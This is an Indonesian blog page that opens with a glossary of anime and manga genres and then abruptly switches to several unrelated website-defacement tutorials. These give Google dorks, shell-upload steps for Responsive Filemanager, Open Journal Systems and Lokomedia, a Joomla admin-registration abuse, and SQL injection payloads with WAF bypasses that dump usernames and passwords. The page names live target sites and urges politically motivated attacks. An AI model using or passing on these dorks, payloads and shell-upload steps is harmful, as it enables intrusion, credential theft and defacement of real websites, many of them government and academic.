KaliGhane

>Setiap anime pastinya memiliki genre, apa itu genre? Gendre adalah pembagian tipe-tipe "cerita" dalam suatu anime, artinya bahwa disetiap anime itu memiliki cerita yang berkofus pada hal tertentu. Misalkan ada suatu anime dimana ceritanya sang pratagonist 'tokoh utama' menaiki sebuah robot lalu pratagonist tersebut melawan musuhnya yang menggunakan robot juga, tipe dari suatu cerita ini adalah Mecha (Pengertian Mecha lihat di bawah), tapi tidak semua anime bertipe satu cerita saja, ada juga anime yang menampilkan dua bahkan lebih. Nah, dikesempatan ini saya akan menjelaskan sedikit arti dari masing-masing genre dalam anime maupun manga, mungkin saja ada yang belum mengetahui genre apa saja yang ada di anime dan apa saja arti dari masing-masing genre tersebut.


Oke, berikut ini list genre beserta pengertiannya.

Kategori Genre dalam Anime

Pada dasarnya di bawah ini adalah list genre yang biasanya di tampilkan dalam sebuah anime maupun manga, silahkan disimak yah ....

Action

Genre Action adalah genre anime ataupun manga yang berunsur peperangan, kekerasan dan penuh aksi, dan benturan kekuatan fisik. Sering kali tokoh genre ini memiliki luka yang cepat karena benturan fisik tersebut.
Contoh :  Fullmetal Alchemist: Brotherhood

Adventure

Genre Adventure adalah Genre anime ataupun manga yang menjelajahi tempat-tempat, lingkungan dan situasi yang baru. Biasanya dikaitkan dengan orang yang memiliki perjalanan panjang ke tempat-tempat yang jauh dan mengalami hal-hal yang menakjubkan.
Contoh : Ookami to Koushinryou

Cars

Genre Cars adalah genre anime ataupun manga yang berfokus pada mobil mungkin juga bisa balapan, sebagian besar genre ini ada di genre Action (Lihat pengertian Action di atas).
Contoh : Initial D

Comedy

Genre Comedy adalah genre anime ataupun manga yang berunsur lawakan baik itu dari tingkah laku, cerita maupun dari pembicaraan.
Contoh : Danshi koukousei no nichijou

Dementia

Genre Dementia adalah genre anime ataupun manga yang memiliki plot mind-twisting 'cerita yang membingungkan'.
Contoh : Neon Genesis Evangelion

Demons

Genre Demons adalah genre anime ataupun manga yang disetting (diatur) dimana dunia setan dan makhluk gelap lainnya memiliki peran penting, bisa juga tokoh utamanya yang memainkan peran 'Demons' tersebut.
Contoh : Hataraku Maou sama

Drama

Genre Drama adalah genre anime ataupun manga yang mengungkapkan secara kompleks, penuh emosional, dan konflik batin.
Contoh : Clannad

Ecchi

Genre Ecchi adalah genre anime ataupun manga yang menunjukan sedikit konten vulgar akan tetapi tidak sampai pada tahap seksual, bisa juga dikatakan sindiran dari seksualitas. Di genre ini biasanya menampilkan OPPAI (Buah Dada perempuan), pantsu (Celana dalam), tubuh telanjang yang tidak berunjung sampai tahap seks yang paling kriteria adalah baju robek-robek.
Contoh : Tu love ru series

Fantasy

Genre Fantasy adalah genre anime ataupun manga dimana tidak ada di dunia nyata, genre ini hanya bercerita fiksi dan penuh imajinatif, artinya bahwa hanya sekedar imajinasi (Seperti kamu melamun saja dan membayangkan ada sayap di kaki kamu).
Contoh : Zero no tsukaima

Game

Genre Game adalah genre anime ataupun manga yang berfokus pada permainan seperti permainan kartu, video game, dan  permainan lainnya. Biasanya di genre ini permainan yang dimainkan tidak melibatkan permainan olahraga, dan permainan yang mengandung unur kekerasan.
Contoh : No game no life!

Harem

Genre Harem adalah genre anime ataupun manga dimana tokoh utamanya (Laki-laki) di keliling banyak tokoh perempuan.
Contoh : Ichiban Ushiro no Daimaou

Ada juga sub genre Harem ini yaitu Reverse Harem dimana tokoh (Perempuan) dikelilingi banyak tokoh laki laki, kebalikannya genre Harem.
Contoh : Amnesia

H

Genre Hentai (biasa disingkat 'H') adalah genre anime ataupun manga yang menunjukan konten vulgar dan berakhir dengan hubungan seksual. ~ If You Know What I Mean ~
Contoh : Oni chi chi

Historical

Genre Historical adalah genre anime ataupun manga yang disetting (diatur) di masa lampau, biasanya mengikuti cerita sejarah dan cerita fakta di masa lampau lainnya.
Contoh : Oda Nobuna no Yabou

Horror

Genre Horror adalah genre anime ataupun manga yang menyeramkan, terkadang bikin bulu kuduk kita merinding karena biasanya di ambil dari kisah hantu.
Contoh : Another

Josei

Genre Josei adalah genre anime ataupun manga yang ditargetkan pada perempuan usia 18-30 tahun/tingkat kuliah, cerita romancenya lebih realitas, dengan cerita lebih dewasa dan eksplisit.
Contoh : Hachimitsu to Clover

Kids

Genre Kids adalah genre anime ataupun manga yang dikhususkan untuk anak-anak, namun tokoh pemain di genre ini tidak hanya anak-anak saja, remaja pun ada.
Contoh : Crayon Shin-chan

Magic

Genre Magic adalah genre anime ataupun manga yang berpusat pada tema sihir/penyihir dan tidak dijelaskan secara hukum alam dan sains. Genre magic ini adalah sub-genre dari Fantasy. jadi jika kamu menemukan genre Fantasy pasti ada hubungannya dengan genre Magic.
Contoh : Magi the labyrinth of magic

Martial Arts

Genre Martial Arts adalah genre anime ataupun manga yang berunsur seni bela diri. seperti takewondo, boxing, karate dan sejenisnya.
Contoh : Yu Yu Hakusho

Mecha

Genre Mecha adalah genre anime ataupun manga yang berunsur robot dan perang, jadi intinya di dalam anime/manga ini semua berunsur dengan robot. Menurut wiki kata Mecha bisa di artikan menjadi robot
Contoh : Gundam seed

Military

Genre Military adalah genre anime ataupun manga yang memiliki karakteristik milliter atau bisa juga dikatakan berhubungan dengan militer.
Contoh : Code Geass

Music

Genre Music adalah genre anime ataupun manga yang berfokus pada penyanyi, grup idol maupun orang yang bermain instrumen.
Contoh : Love Live

Mystery

Genre Mystery adalah genre anime ataupun manga yang mengungkapkan sebuah kasus, tidak semua kasus 'rahasia' di genre misteri ini dikaitkan dengan kejahatan, bisa juga dengan kehidupan sehari hari.
Contoh : Hyouka

Parody

Genre Parody adalah genre anime ataupun manga yang berunsur lawakan, akan tetapi lawakan yang disajikan di genre ini berbeda dengan Comedy. Lawakan yang disajikan adalah plesetan dari "Komik, Manga, Film, Sinetron, Acara komedian, TV, Peristiwa sejarah bahkan anime lain".
Contoh : Gintama

Police

Genre Police adalah genre anime ataupun manga yang disetting (diatur) dimana sebuah organisasi pelindung masyarakat "Polisi" memiliki peran penting, bisa juga tokoh utamanya yang memainkan peran "Polisi" tersebut.
Contoh : Psycho-Pass

Psychological

Genre Pyscological adalah genre anime ataupun manga yang ceritanya mengedepankan psikologi atau mental karakter.nya. maksudnya mereka mencakup satu atau lebih hal berikut:

• Cerita mengundang pengunjung untuk menyelidiki alasan untuk apa yang terjadi di dalam cerita
• Cerita ini adalah lebih lanjut tentang kondisi mental pahlawan dari peristiwa aktual.
• Cerita adalah thriller psikologis
• Cerita mencoba sengaja membingungkan penonton, seringkali dengan menunjukkan mereka hanya sebagian informasi mengenai apa yang sedang terjadi
• Ada lebih dari jumlah biasa penekanan pada karakterisasi interior, dan pada motif, situasi, dan tindakan internal yang timbul dari tindakan eksternal.

Contoh : Evangelion

Romance

Genre Romance adalah genre anime ataupun manga yang ceritanya tentang dua orang bahkan bisa lebih (Harem) yang ingin cintanya terwujud atau menjaga cintanya dengan orang yang disukainya. Sebuah anime pasti ada romance nya namun yang ditekankan bukanlah genre romance melainkan genre pada anime itu sendiri.
Contoh : Lovely Complex

Samurai

Genre Samurai adalah genre anime ataupun manga dimana tokoh utamanya adalah seorang samurai, tokoh prajurit abad pertengahan jepang, atau sejenisnya.
Contoh : Rurouni Kenshin

School

Genre School adalah genre anime ataupun manga yang berlatarkan di sekolah, biasanya menampilkan kehidupan sehari hari di sekolah.
Contoh : K-ON

Sci-Fi

Genre Sci-Fi adalah genre anime ataupun manga yang didasarkan dengan teknologi dan membayangkan alat-alat ilmiah di dunia, kebanyakan teknologi yang disajikan bukan teknologi yang sekarang melainkan teknologi yang dibayangkan, oleh karena itu Sci-FI (Science is Fiction) adalah Sains fiksi.
Contoh : Ginga Eiyuu Densetsu

Seinen

Genre Seinen adalah genre anime ataupun manga yang ditargetkan pada laki-laki usia 18-30 tahun/tingkat kuliah, ceritanya dibuat untuk menarik golongan mahasiswa atau yang sudah berada di dunia kerja. Biasanya cerita berkisar dalam dunia nyata dan pendewasaan diri.
Contoh : Rainbow: Nisha Rokubou no Shichinin

Shoujo

Genre Shoujo adalah genre anime ataupun manga yang diperankan oleh wanita dan dipertunjukan untuk perempuan. Biasanya merupakan kisah romantis, dan terdapat pengembangan karakter yang kuat dalam cerita.
Contoh : Kimi no todoke

Shoujo-ai

Genre Shoujo-ai adalah genre anime ataupun manga yang berunsur hubungan cewek X cewek, hanya sebatas teman dekat dan tidak sampai pada tahap seksual.
Contoh : Yuri yuri

Shounen

Genre Shounen adalah genre anime ataupun manga ditujukan terutama bagi laki-laki, dimana biasanya mengandung pertarungan dan kekerasan.
Contoh : One Piece

Shonen-ai

Genre Shounen-ai adalah genre anime ataupun manga yang berunsur hubungan cowok X cowok, hanya sebatas teman dekat dan tidak sampai pada tahap seksual.
Contoh : Junjou Romantica

Slice of Life

Genre Slice of life (Biasa disingkat 'SOL) adalah genre anime ataupun manga yang berunsur kehidupan sehari-hari, biasanya kehidupan itu pernah kita alami, jenis genre ini cenderung naturalistik dan biasanya berfokus di sekitar "Kehidupan sehari hari" tokoh utama. Seringkali juga dikaitkan dengan percintaan, hubungan sang tokoh utama.
Contoh : Ano Hi Mita Hana no Namae wo Bokutachi wa Mada Shiranai

Space

Genre Space adalah genre anime ataupun manga yang berlatarkan di luar angkasa, biasanya juga berhubungan dengan mendarat ke planet lain. Contoh : Uchuu Kyoudai

Sports

Genre Sports adalah genre anime ataupun manga yang temanya adalah olahraga seperti basket, voli, sepak bola, dan sejenisnya.
Contoh : Kuroko no basuke

Super Power

Genre Super Power adalah genre anime ataupun manga dimana tokoh utamanya memiliki kekuatan yang lebih daripada manusia umumnya "Kekuatan yang luar biasa".
Contoh : Katekyo Hitman Reborn!

Supernatural

Genre Supernatural adalah genre anime ataupun manga dimana melibatkan Paranormal, Vampire, Hantu, Mayat hidup (Zombie), Setan (Demons), dan sejenisnya, biasanya juga di genre ini tokoh utamanya memiliki kekuatan Vampire, atau sejensinya.
Contoh : Hotarubi no Mori e

Thriller

Genre Thriller adalah genre anime ataupun manga dimana memiliki cerita berupa para jagoan yang penuh dengan aksi menantang, dan mendapatkan bantuan yang kebetulan sangat dibutuhkan untuk menggagalkan rencana-rencana kejam para lawannya "Antagonis". (Selengkapnya bisa lihat di wikipedia)
Contoh : Fate/Zero

Vampire

 Genre Vampire adalah genre anime ataupun manga yang disetting (diatur) dimana para vampire memiliki peran penting, bisa juga tokoh utamanya yang memainkan peran 'Vampire' tersebut.
Contoh : Blood lad

Yaoi

 Genre Yaoi adalah genre anime ataupun manga yang berunsur hubungan cowok X cowok sampai pada tahap seksual.
Contoh : Boku no pico

Yuri

 Genre Yuri adalah genre anime ataupun manga yang berunsur hubungan cewek X cewek sampai pada tahap seksual.
Contoh : Strawberry Panic
Untuk Lengkapnya, mengenai kategori genre dalam anime dan manga bisa dilihat digambar di bawah ini
      Itulah istilah-istilah dari masing masing genre semoga dengan adanya ini kamu menjadi mengerti dari masing-masing genre. Terima kasih untuk Kaskus, Nick Eva(Yahoo id), Myanimelist yang sudah memberi tahukan kepada anime lovers tentang istilah dari masing-masing genre ini. Pengertian di atas saya ambil dari berbagai sumber dan saya sajikan dengan kata-kata saya sendiri supaya kamu lebih cepat memahaminya. Jika masih ada belum mengerti kamu bisa menanyakan kepada saya dengan berkomentar di artikel ini.

BAHAN :


1. Dork :


1. inurl:/filemanager/ intext:”dialog.php”
2. inurl:/js/filemanager/ intext:”dialog.php”
3. inurl:/assets/filemanager/ intext:”dialog.php”



dork favorit admin = inurl:/assets/filemanager/ site:.com ( dork bisa anda kembangkan sendiri )


2. Exploit : /dialog.php


3. Tamper Data


4. Shell / Backdoor


5. Script Deface anda


Setelah semua bahan - bahan yang ada di atas telah lengkap , anda kemudian menuju ke tahap tutorial seperti di bawah ini.


Tutorial :




#1. Buka Browser anda dan kemudian masuk ke google search engine .

Contoh kali ini saya menggunakan dork (inurl:/assets/filemanager/ site:.com)

Masukkan dork anda seperti gambar di bawah ini.

















Silahkan anda memilih salah satu target yang telah muncul .




#2 . Setelah anda memilih salah satu target. Akan muncul tampilan baru seperti gambar di bawah ini.









exploit dari responsive filemanager



Pilih file yang bernama " dialog.php " tanpa tanda kutip . karna file tersebut merupakan exploit dari teknik responsive filemanager .


#3. Kemudian setelah anda mengklik file exploit dialog.php , kemudian akan muncul tampilan baru lagi seperti gambar di bawah ini :







Tekan tombol Upload atau yang berada di dalam lingkaran merah pada gambar di atas.


#4. Setelah itu , akan muncul tampilan baru lagi.

Tapi jangan buru - buru dulu , sebelum mengupload ikuti langkah yang ada pada gambar di bawah ini.







Apabila anda telah sampai pada tampilan yang ada diatas. silahkan Gunakan Tamper Data.


Pilih Alat >> Tamper Data >> Lalu anda klik START TAMPER seperti gambar di bawah ini .







#5. Setelah anda meng-klik Start tamper tadi , akan muncul form filemanager untuk mengupload file anda seperti yang ada pada gambar di bawah ini.







Apabila telah muncul tampilan seperti di atas , upload file anda yang ber ekstensi .html
INGAT ! anda hanya bisa mengupload shell / backdoor yang ber ekstensi .html







Kemudian akan muncul form baru lagi seperti diatas , silahkan langsung klik tombol " tamper " seperti pada gambar .







Upload selesai ...


#6 Setelah sukses mengupload shell , sekarang kita akan mengakses shell tersebut.

Caranya klik "Return to file list" seperti gambar di bawah ini.







kemudian kita cari shell / backdoor kita .

Klik kanan pada file shell yang telah kita upload tadi , kemudian pilih "Show URL"seperti gambar dibawah ini.











Nah setelah anda meng klik " Show URL " . Maka akan muncul tampilan yang berisi link tempat dimana shell tersebut di upload, seperti gambar di bawah ini.







Salin URL tadi ke Address bar , dan akhirnya anda sudah masuk ke backdoor ...

Selamat ..











NB : Usahakan jangan menyerang situs dalam negeri sendiri , Gunakan untuk Membasmi kaum zionist .

Dork Terbaru Com_User :

intext:Usar un nombre de usuario y contraseña válido para poder tener acceso a la Administración.. Joomla!® es software libre distribuido bajo la licencia GNU/GPL. Pack creado por Joomla!Spanish - 2011 - Hosting Joomla Spanish Webempresa

intitle:home page beez joomla 1.6 inurl:com/joomla

intitle:home page beez 2 inurl:com/joomla

intitle:home page beez 5 inurl:com/joomla

intitle:home page atomic inurl:com/joomla

intext:Joomla!® - бесплатное программное обеспечение, распространяемое по лицензии GNU General Public License

Локализация: Портал Joomla! по-русски. Техническая поддержка: Форум русской поддержки Joomla! CMS inurl:/administrator

intext:Veuillez utiliser un identifiant et un mot de passe valides pour accéder à l'administration. site:it

intext:Введите существующие логин и пароль доступа к Панели управления. site:ru

inurl:/administrator/index.php intext:Use a valid username and password to gain access to the administrator backend. Joomla!® is free software released under the GNU General Public License.

intitle:joomla! intext:joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

inurl:index.php/using-joomla/extensions/components/users-component/registration-form

inurl:index.php/using-joomla/extensions/plugins site:.com

inurl:index.php/using/joomla site:com

inurl:index.php/using-joomla/extensions/components/content-component/article-category-list/50-upgraders

inurl:index.php/using-joomla/extensions/components/content-component/article-categories/28-park-site/photo-gallery

inurl:index.php/using-joomla/parameters/26-sample-data-articles/park-site

Inurl:index.php/plugins site:com

Inurl:index.php/rss=feed site:com

inurl:index.php/joomla/content/category-blog/24-joomla site:com

inurl:index.php/using-joomla/extensions/components/content-component/article-categories/84-gd-articles site:.com

Bahan-bahan :


1.Exploit Joomla Download

2.Dork Download



Langkah-langkah :



1.Cari web target di google menggunakan dork di atas

2.Open link in new tab semua web yg muncul di hasil pencarian google, karna tidak semua web bisa

3.Cari web yg Vuln



Gambar di atas merupakan site yg vuln






Gambar di atas merupakan site "Joomla yg samar-samar"




Note :




- Perbedaan site vuln dengan yg lainnya terlihat pada bagian bawah atau footer administration login pada web joomlanya.




- Web yg saya namakan "samar-samar" itu bukan berarti sitenya tidak bisa di deface/tidak vuln, hanya saja web yg seperti itu peluangnya dapat di deface hanya 5% dari keseluruhan web joomla seperti gambar di atas, tapi juga anda telah lama mendeface web dengan cara ini anda akan mengetahui ciri" web joomla yg bisa di deface tanpa harus melihat halaman administratornya.




- Pastikan web yg anda ingin deface adalah web yg vuln, karena web yg vuln 60% bisa di deface.




4.Setelah menemukan site yg vuln, masukan exploit berikut di belakang sitenya.




index.php?option=com_users&view=registration




5.Setelah anda sudah memasukan expoit ke web target anda akan masuk ke tempat registrasi.









6.Setelah masuk ke tempat registrasi seperti gambar di atas, maka langkat selanjutnya adalah menekan tombol ctrl+u, dan nanti akan muncul seperti gambar di bawah ini









7.Cari kode hidden dengan menekan tombol ctrl+f









8.Copy kode yg di berikan kotak merah tersebut ke Exploit Joomla yg telah anda download tadi




9.Buka Exploit Joomla yg telah anda download tadi dengan notepad, lalu anda paste kan kode yg telah kamu copy tersebut di kotak merah kedua (yg paling bawah) dan masukan alamat web yg telah di exploit tersebut




Contoh : http://www.ssjuvestabia.it/index.php?option=com_users&view=registration ke kotak merah yg pertama




Note :




- Jangan lupa ganti alamat email dan usernamenya (terserah kamu)

- Password di biarkan berbeda












10.Save file tersebut




11.Lalu buka Exploit Joomla tersebut dengan web browser (google chrome/mozilla/Maxthon.dll)




12.Setelah di buka akan muncul tampilan seperti gambar di bawah ini









13.Setelah di buka dengan web browser dan muncul tampilan seperti gambar berikut, lalu langkah selanjutnya adalah klik tombol Register yg terdapat di bagian bawah




14.Lalu akan ada tulisan password yg anda masukan tidak sama (kalau di bahasa indonesia kan)









15.Ganti password tersebut (terserah anda) dan klik register kembali




16.Setelah sukses, buka alamat link aktivasi yg terdapat pada email anda




17.Setelah di klik link aktivasi pada email maka anda telah menyelesaikan registrasi,dan sekarang anda bisa login kedalam halaman administrator.(tambahkan kode /administrator di belakang alamat web tersebut)




Contoh : http://www.ssjuvestabia.it/administrator/









18.Setelah itu anda masukan username dan password yg anda sudah buat tadi, lalu login









19.Nah sekarang anda sudah masuk kedalam halaman adminnya dan tinggal di tebas indexnya







Note :




- ada 4 kemungkinan gagal untuk web yg menggunakan CMS Joomla :




1.Web telah menghapus laman Registration Form




2.Alamat Activation Link tidak masuk kedalam email




3.User sudah di aktifkan tetapi kita tidak bisa masuk kedalam administrator panel tersebut




4.Template tidak bisa di ubah.







Sekian dulu tutorial dari saya semoga bermanfaat dan selamat mencoba :)

sekarang saya akan mengeshare toturial deface open journals system :)

meskipun sudah banyak yang tau toturial kali ini :) tapi saya akan mengeshare versi saya :)

dork :inurl:index.php/index/user/regster site:

:inurl:/files/journals/1/

:"kntl"+intitle:"open journals system"

exploit :/files/journals/

vuln :403 forhidden or index of /files

live taget: http://www.jghcs.info

1.pertama anda dorking terlebih dahulu di google atau pun di bing



2.cari target anda lalu masukan exploit:/files/journals jika ada bacaan forhidden atau index of /files berarti vuln






3.lalu anda register ke site tersebut cek gambar











4.kemudian klik new submission dan ikuti langakah" pada gambar berikut :D



















akses shell www.site.co.li/files/journals/1/articles/nopertama/submission/original/nomernya.phtml

contoh:

http://www.jghcs.info/files/journals/58/articles/526/submission/original/526-2010-1-SM.txt










terima kasih banyak telah mampir di blog saya jika ada kesalahan mohon maaf dan bila ada kritik atau saran tinggal komentar di bawah ini :D

Oke kali ini ane mau share Defece Metode Sql Lokomedia, sebelum kita mulai saya mau berterima kasih ke pada Sepprudien A.K.A Mr.Trouble5hooting :D ,mastah lokomedia hhehehehehe ,,oke Kecoa kita ke TKP.


Bahan :

A. Dork
B. Rokok + Kopi

C . Internet yg penting :v


1. Dork .


inurl:statis-1-profil.html

inurl:statis-2-profil.html

inurl:statis-3-strukturorganisasi.html

intext:lokomedia inurl:statis- ext:html

intext:lokomedia inurl:kategori- 6 - .html

intext:lokomedia inurl:semua- ext:html

inurl:kategori-32-daerah.html site:.com

intext:copyright by inurl:statis-1 ext:html

intext:lokomedia inurl:statis- ext:html

intext:lokomedia inurl:semua- ext:html

intext:lokomedia inurl:hubungi- ext:html

intext:lokomedia inurl:kategori- ext:html

intext:lokomedia inurl:berita- ext:html

inurl:foto_info

inurl:foto_produk intext:shop

inurl:foto_banner intext:shop

inurl:foto_berita intext:shop

inurl:foto_user intext:shop

inurl:/adminweb/login "Halaman Login"

inurl:content.php?module=banner

inurl:content.php?module=user

inurl:content.php?module=berita

inurl:content.php?module=iklan

inurl:content.php?module=produk

intext:copyright @ "Developed by" inurl:/berita- - ext:html site:.

intext:Kembali ke Website Utama

intext:Developed by inurl:berita- ext:html

"Developed by" inurl:/statis-1- ext:html site:.

inurl:/statis-10 ext:html

inurl:/statis-16 ext:html

intext:copyright @ "Developed by" inurl:/berita- - ext:html site:.

intext:Kembali ke Website Utama

intext:Developed by inurl:berita- ext:html

intext:copyright by inurl:statis-1 ext:html

inurl:/semua-berita.html site:coli :V "Total Pengunjung Hari Ini"

intext:copyright @ "Developed by" inurl:/berita- - ext:html site:.

intext:Kembali ke Website Utama

intext:Developed by inurl:berita- ext:html

"Developed by" inurl:/statis-1- ext:html site:.

"Developed by" inurl:/statis-1- ext:html site:.com/net/id/coli :V

Copyright © 2013 by Polostama. All rights reserved.

inurl:media.php?module=home

#Selebihnya kembangin Peke Imajinasi Cabul mu ,,, :D
2. Exploit SQLi (SQL Injection) :

www.target.co.li/Kategori- :'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--


www.target.co.li/statis- :'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+


Tutornya :

1. Cari target dahulu , sebagai contoh nya ,saya menggunakan DORK
statis-1-profil.html lalu search di GOOGLE nanti akan banyak
SITE nya . :D

2. Buka Website tersebut , Contoh http://netnot. com/statis-1-pengantar.html

lalu masukan Exploit nya di http://site.com/statis--1'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html

Kalau ane dapatnya yang http://target.com/berita-blabl-ablabla-blabla{-}nla.html
exploitnya di dalam kurung yah,, kaya gambar ini,, :D



tuh,, Muncul deh Kode Buat Colinnya :V

3. Tinggal di decrypt deh di disini :V






4 . jika password tersebut di temukan carilah admin login nya dengan Imajinasi,,, biasannya
di
/admin/
/adminweb/
/administrator/
/redaktur/


DORK PAGE LOGIN :






intext:Developed by inurl:berita- ext:html


intitle:.:: Administrator - Website ::. intext:LOGIN ADMINISTRATOR "BATALKAN"


intittle:adminstration login lokomedia site:go.id


intitle:.:: Administrator - Website ::. intext:LOGIN ADMINISTRATOR site:.ac.id


intittle:adminstration login lokomedia site:go.id


intitle:.:: Administrator - Website ::. intext:LOGIN ADMINISTRATOR site:.ac.id


intittle:Administrator CMS Lokomedia


intittle:..::: Login Anggota :::..


intitle:.:: HALAMAN ADMINISTRATOR ::.


intittle:..::: Login Elearning :::..


intittle:..::: Login Administrator :::.. site:go.id


intittle:.:: Login Adminstration ::. site:go.id


intittle:..::: Login Sistem ::.. site:go.id


intittle:.:: ADMINISTRATOR LOGIN ::. site:go.id


intittle:adminstration > login site:go.id


intittle:adminstration > Website site:go.id


intitle:Panel Administrator


inur:.com/adminweb "Username"


inur:.org/adminweb "Username"


inur:.net/adminweb "Username"


inur:.go.id/adminweb "Username"


inur:.desa.id/adminweb "Username"


inur:.co.id/adminweb "Username"


inur:.web.id/adminweb "Username"









6.Anggap saja page loginnya dah ketemu,,, :V


7. Truzzzzz,,, login Hasil Coli lo,, dengan Pw tadi,,,

8.Untuk Uploud Shellnya Di Download,, biasakan yang .phtml atau Menggunakan Tamper Data jadi Ruba File Shellnya jadi Shell.php.jpg Terus KLIK Tamper Hapus yang .jpg di Sebelah Kanan Kolom nya Dan Klik Oke-Oke terus,,
Hingga Uploud Sukses :V,,







































10. Anggap aja dah Tertanam,,, :V ,, Panggil Shellnya contoh http://target.com/files/shellkamu.phtml ia kamuu.. :V






11Setelah itu cari Halaman yang /public_html/ Cari File nya yang Index.php atau Media.php




#UTAMAKAN BACK_UP tinggal Rename aja File Aslinnya,, Ganti Dengan Script Deface Lo,,




12. Dan Lihat ,, :V











Tapi Ingat "Imajinasi Itu Tak Terbatas"







thank's to Sepprudien :D

// Author : Zbyte


// Team : K33P-S1L3NT


// Notif : Ternate Lab Pentesting


// page : https://www.facebook.com/loading.gov


// channel : https://www.youtube.com/channel/UChFMZ01R8Z1mhh2tWc-BddQ


// Grets : QueenAisyah | geek_Defcon | kazutto_kun | s1puT | Badaki | 1!0N7!N | i.am_geek | Admiral | Kopral


// CMS : http://imagomedia.co.id/


// DORK : inurl:/hal-visi-misi ext:html


// Admin page : site.com/user/index.php or site.com/admin/



// Special : Overload Team | Cyber Team Cirebon | Mr.Trouble5hooting


// Demo : http://imagomedia.co.id/notif.php










+ IMAGO MEDIA CMS SQL INJECTION + -----------------------------
// Author : Zbyte
 // Team : K33P-S1L3NT
// Notif : Ternate Lab Pentesting
// page : https://www.facebook.com/loading.gov
// channel : https://www.youtube.com/channel/UChFMZ01R8Z1mhh2tWc-BddQ
// Grets : QueenAisyah | geek_Defcon | kazutto_kun | s1puT | Badaki | 1!0N7!N | i.am_geek | Admiral
// CMS : http://imagomedia.co.id/
// DORK : inurl:/hal-visi-misi ext:html
// Admin page : site.com/user/index.php or site.com/admin/
// Special : Overload Team | Cyber Team Cirebon | Mr.Trouble5hooting
// Demo : http://imagomedia.co.id/notif.php Description =========== ###############################################################
( string ) code ( ' ) <= blank or not output reload image <= vuln
( bug SQL INJECTION )
( +--+ ) <= magic code /*!union*/+/*!select*/ <= code for bypass WAF 406 not acceptable /*!12345union*/+/*!12345select*/ <= code for bypass WAF 403 forbidden number magic found on number ( 9 ) ( and false ) <= tricks for open magic number ( version() ) <= code for cek version database ( database() ) <= code for cek database name code for displays table names ------------------------------ group_concat(table_name) from+information_schema.tables+where+table_schema=database() code for Bypass WAF displays table names -------------------- group_concat(/*!table_name*/) from+information_schema./*!tables*/ where /*!table_schema*/=database() code for displays column names ----------------------------- group_concat(column_name) from+information_schema.columns+where+table_name=0xtablename code for Byapass WAF displays column names ----------------------------------------- group_concat(/*!column_name*/) from information_schema./*!columns*/ where /*!table_name*/=0x7461626c656d616e6573 <= HexEncoding ( tablenames ) code for displays username & password -------------------------------------- group_concat(username,0x3a,pswd,0x3a,status) from+tablemanes ############################################################### Proof of Concept ----------------
site.com/hal-visi-misi.html <= default site.com/hal-visi-misi'.html
site.com/hal-visi-misi' order by 10+--+.html site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,9,10+--+.html site.com/hal-visi-misi' /*!union*/+/*!select*/+1,2,3,4,5,6,7,8,9,10+--+.html site.com/hal-visi-misi' /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html site.com/hal-visi-misi' and false /*!12345union*/+/*12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html <= site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,version(),10+--+.html site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,database(),10+--+.html site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,group_concat(/*!table_name*/),10+from+information_schema./*!tables*/ where /*!table_schema*/=database()+--+.html site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,group_concat(/*!column_name*/),10+from information_schema./*!columns*/ where /*!table_name*/=0x7461626c656d616e6573+--+.html site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,pswd,0x3a,status),10+from+tablemanes+--+.html